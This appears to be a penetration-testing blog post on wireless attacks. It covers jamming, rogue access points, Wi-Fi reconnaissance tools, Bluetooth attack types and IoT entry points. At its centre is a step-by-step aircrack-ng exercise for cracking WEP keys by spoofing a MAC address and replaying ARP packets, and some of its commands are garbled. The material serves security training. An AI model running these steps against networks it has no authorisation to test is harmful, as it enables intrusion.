This action creates an issue with the availability of the network and results in a targeted denial-of-service attack against access points in the area. It is possible to use a specially designed jammer that can transmit signals that can overwhelm and deny the use of the access point by legitimate clients.
Note that jamming, while effective, is not something that should be carried out unless special permission is obtained. The reason for this situation is because blocking RF signals of any type is illegal and can result in substantial fines if you are caught.
Most, if not all, jammers are only available from overseas sources such as China. Seriously consider if trying this type of attack is something that needs to be done and, if so, how you will obtain permission from the applicable regulatory agencies.
A honeypot attack partly relies on social engineering and an understanding of how people use technology. Users can (and do) connect to any available wireless network they can find and may inadvertently attach to a network that is malicious.
In such a situation, an attacker can attract unknowing or unsuspecting users to attach to the access point that they themselves control.
To carry out this type of attack, a malicious party must set up a rogue access point (typically in the range of legitimate ones where possible). With the rogue access point generating a much stronger and clearer signal, it is possible to attract clients looking for an access point to attach to.
Once this has taken place, a malicious attacker can choose to view, modify, or block network traffic.
Choosing Tools to Attack Wireless
Several tools and mechanisms make locating a target network easy. Once you locate a wireless network, it is possible to strike it.
Picking a Utility
The following are methods that can complement wardriving or be used on their own:
OpenSignal This app can be used on the web at 3G and 4G LTE Cell Coverage Map or on a mobile device. You can use it to map out Wi-Fi networks and 3G/4G networks, as well as correlate this information with GPS data.
Kismet A Linux-based tool that is effective in locating wireless networks passively, meaning that the tool does not do much to reveal its presence to those who may be looking or listening.
InSSIDer This utility can be used to located wireless networks in an area and provide information on channels, frequency, and power.
Network Signal Info This application is available for the Android operating system and can be used to both analyze and locate wireless networks.
Wireshark is a sniffing utility but can also be used to intercept traffic from wireless networks. However, to fully analyze wireless network traffic with Wireshark, the AirPcap USB dongle is required. With AirPcap it is possible to analyze wireless traffic all the way down to the hardware layer.
Under ideal conditions, these tools can help locate any of the following information about a wireless network:
Presence of multiple access points Possibility of recovering SSIDs Authentication method used
Choosing the Right Wireless Card
If you are going to analyze and interact with wireless networks as a pentester, you need to consider the wireless card or adapter that you will be using. In the majority of wireless cards you will not have to consider all that much about the make, model, and manufacturer of a card most are compatible with the tools and techniques you will use.
However, in the case of mobile devices such as tablets and cell phones, which may use Wi-Fi, the internal adapters typically do not support the advanced features you need. This situation necessitates the use of external adapters.
When purchasing a wireless adapter, consider the following:
The operating system in use Application in use Whether packet injection is required (Windows systems cannot perform packet injection; if this is required, then Linux must be used)
Manufacturer of wireless card and chipset (you must know both since the two can be made by two different manufacturers)
Whether the adapter supports both monitor and promiscuous modes. If you are using virtualization, you may also need to check whether your card will work with this environment.
Let’s put this all together and try breaking WEP using Linux.
In this exercise, you will use Linux with a few tools to crack and retrieve a WEP key. The version of Linux you will use for this exercise is Kali 2.0 and you won’t use virtualization.
(If you choose to use virtualization, you will need to obtain a USB wireless adapter and consult your virtualization software to configure the adapter to be recognized as a wireless card.)
1. Obtain information about your wireless card by running the command iwconfig from the Terminal window.
If your wireless card is detected by your operating system, it will start with the prefix “wlan,” followed by a number.
In most cases, the numbering will start with zero (i.e., wlan0) and will count up from there.
2. Put the wireless adapter into monitor mode in order to pick up wireless traffic. This can be done by executing the command
Airmon-ng start wlan0
where wlan0 is the name your adapter was given.
3. Capture traffic using the command
Airodump-ng start mon0
where mon0 is the monitoring interface.
4. List the wireless networks in the area:
5. In the list of networks, locate your target network and note the BSSID and channel.
6. Using the airodump-ng software, start capturing packets from the target network:
airodump-ng -c [channel] --bssid [bssid] [monitor interface]
airodump-ng –c 11 –bssid 00:09:5B:6F:64:1E mon0
7. Inject packets into the network by waiting for someone to connect so you can obtain their MAC address.
8. Once you have captured the MAC address and have extracted it from the air-dump file, you can replay the MAC as part of an ARP request using airplay-ng. You will be capturing an ARP packet and then replaying that ARP thousands of times in order to generate the IVs that you need to crack
WEP. To do this, you will need to spoof the target’s MAC address.
You can use aireplay-ng to do this.
Aireplay-ng -11 –b 00:09:58:6F:64:1F
–h 44:60:57:C8:58:A0 mon0
Aireplay-ng –[c] –b [bssid of AP]
–h [MAC of target] [interface]
where c is the channel you want to observe.
Airodump will capture the traffic generated into a file in the current folder on the local system.
9. Once you have enough traffic (usually around 100,000+ packets in many cases), stop the capture by pressing Ctrl+C.
10. To recover the password or key, use aircrack-ng: Aircrack-ng [filename.cap] where filename.cap is the name of the capture file.
If you have captured enough traffic, aircrack-ng will display the key on your screen, usually in hexadecimal format.
Simply take that hex key and apply it when logging into the remote AP and you should connect to the network.
Knocking Out Bluetooth
Wi-Fi isn’t the only wireless technology on the block—we can’t leave out Bluetooth. Bluetooth is a series of specifications that refer to a short-range technology that is used to create personal area networks (PANs). This technology is extremely common nowadays and appears in everything from mobile phones to cars and game controllers.
Bluetooth is designed to be a universal standard for communications for devices of all types. The communication protocol operates in the 2.4 to 2.485 GHz band and was developed in 1994 by Ericsson Corp.
Under normal conditions, Bluetooth has a distance of about 30 feet or 10 meters. However, manufacturers can choose to implement measures or features in their products to increase the range of their products substantially. With special antennas, you can extend the range even further.
The process through which two Bluetooth-capable devices connect to each other is known as pairing. Any two Bluetooth-capable devices are able to connect to each other.
To do this, a device will typically need to be discoverable so it can transmit its name, class, offered services, and other details. When devices pair, they will exchange a pre-shared secret or link key. They store this link key to identify each other for future pairings.
Much like networking technologies, every device has its own unique 48-bit identifier and generally an assigned name.
Once paired, Bluetooth devices create a piconet (or very small net). In a piconet, there is one master and up to seven active slaves at any one time. Because of the way Bluetooth devices work, the chances of any two devices sharing the same channel or frequency is very low and therefore conflicts are kept to a minimum.
One of the problems with Bluetooth is that it generally is a very short-range technology; however, the problem is a perception on the part of the users of this technology.
Many users of Bluetooth-enabled devices believe that, because the technology is so short range, it is impervious to attack since attackers would need to be within visual range.
However, this is not true. The hacking process is easy for an attacker because all they need is the software, a suitable device, and some basic knowledge.
So, how good is Bluetooth security? Well, that’s a question still open to debate, but in general, security is limited to a few techniques. First, frequency hopping— a process in which the frequency is changed at regular intervals during communication—is used to prevent conflicts or other issues.
Both the master and slave know the frequency hopping algorithm, but the outsider does not and therefore should not be able to get the correct frequency easily. Second, a preshared key is exchanged at a pairing that is used for authentication and encryption (128-bit).
The three security modes for Bluetooth are
Security Mode 1 No active security.
Security Mode 2 Service-level security. A centralized security manager handles authentication, configuration, and authorization. This mode may not be activated by the user, and there is no device-level security.
Security Mode 3 Device-level security that is always on. Authentication and encryption are based on a secret key. This mode enforces security for low-level connections.
Much like with wardriving, an attacker who has the software installed on their mobile phone, laptop, or netbook will know which ones to target.
All the hacker has to do is to walk around in public places and let their software do all the work, or they can sit down in a hotel reception or restaurant pretending that they are working.
The whole process is automatic for the hacker because the software in use will scan nearby surroundings for Bluetooth devices.
When the hacker’s software finds and connects to a Bluetooth-enabled cell phone, it can download contact information, phone numbers, calendars, photos, and SIM-card details; make free long-distance phone calls; bug phone calls; and much more.
Types of Bluetooth Attacks
Let’s take a look at some of the attacks you can perform using Bluetooth:
Bluesnarfing The process of gaining unauthorized access to access and download all information from a targeted device. In an extreme case, bluesnarfing even opens the door for a hacker to send instructions to completely corrupt and destroy.
Bluebugging An attack in which an attacker plants software on a device that allows it to become a bugging device on demand. Once your device is bluebugged, the hacker can listen in on anything you and anyone around you are saying.
Bluejacking The process of sending unsolicited messages to a Bluetooth-enabled device; akin to spamming.
Bluesniffing The attacker is capable of viewing information as it flows to and from a Bluetooth-enabled device.
Many of these attacks can be carried out with specialized software and the right hardware. In the case of Bluetooth, you must have an adapter that injects packets into the network and also has sufficient range, allowing it to be out of sight of the victim. Currently, a number of Bluetooth adapters are available that can extend the range of transmissions to over 1000 feet with an external antenna.
Things to Remember About Bluetooth
When working with Bluetooth devices, you should keep some specifics in mind about the devices and how they operate. First, the device can operate in one of the following modes:
Discoverable This allows the device to be scanned and located by other Bluetooth-enabled devices.
Limited Discoverable In this mode, the device will be discoverable by other Bluetooth devices for a short period of time before going back to being nondiscoverable.
nondiscoverable As the name suggests, devices in this mode cannot be located by other devices. However, if another device has previously found the system, it will still be able to do so.
In addition to the device being able to be located, it can be paired with other devices to allow communication to occur. A device can be in pairing or nonpairing mode. In pairing mode, it can link with another device.
Hacking the Internet of Things (IoT)
We can’t finish up this blog without discussing something that you need to check for as a pentester: the Internet of Things (IoT). The IoT is a buzzword used to refer to the increasing numbers of objects that can connect to the Internet that don’t fit nicely into the category of computers or other devices.
For example, objects such as appliances, sensors, home automation systems, vehicle media systems, wearable computing devices, and more all come in variations that connect to the Internet for data exchange purposes.
Such systems typically have an embedded OS and a wireless or wired card that can be configured to attach to a home or business network.
The problem with these devices from a security standpoint is simply the fact that most of them don’t have any security. Many of these devices were designed to offer specific functions to the consumer or business, and typically this means that little or no attention was given to security.
Poor or missing security measures can be the bane of network admins—and a potential entry point for you as a penetration tester.
From a penetration tester standpoint, you may want to use your tools to scan for wireless-enabled devices to see if you can identify an IoT device. Once you find such a device, you can attempt banner grabs or port scans to see if you can identify the device.
If you can identify it, do your research to see if you can find potential entry points or vulnerabilities you can exploit. If done right, you can use a compromised device as a pivot point, or a launching point, for deeper strikes into a target network.
From a defensive perspective, these devices should not only be evaluated for security issues, but also placed on their own special network segment. To improve security, any object that needs to be directly accessible over the Internet should be segmented into its own network and have its network access restricted.
The network segment should then be monitored to identify potential anomalous traffic, and action should be taken if there is a problem.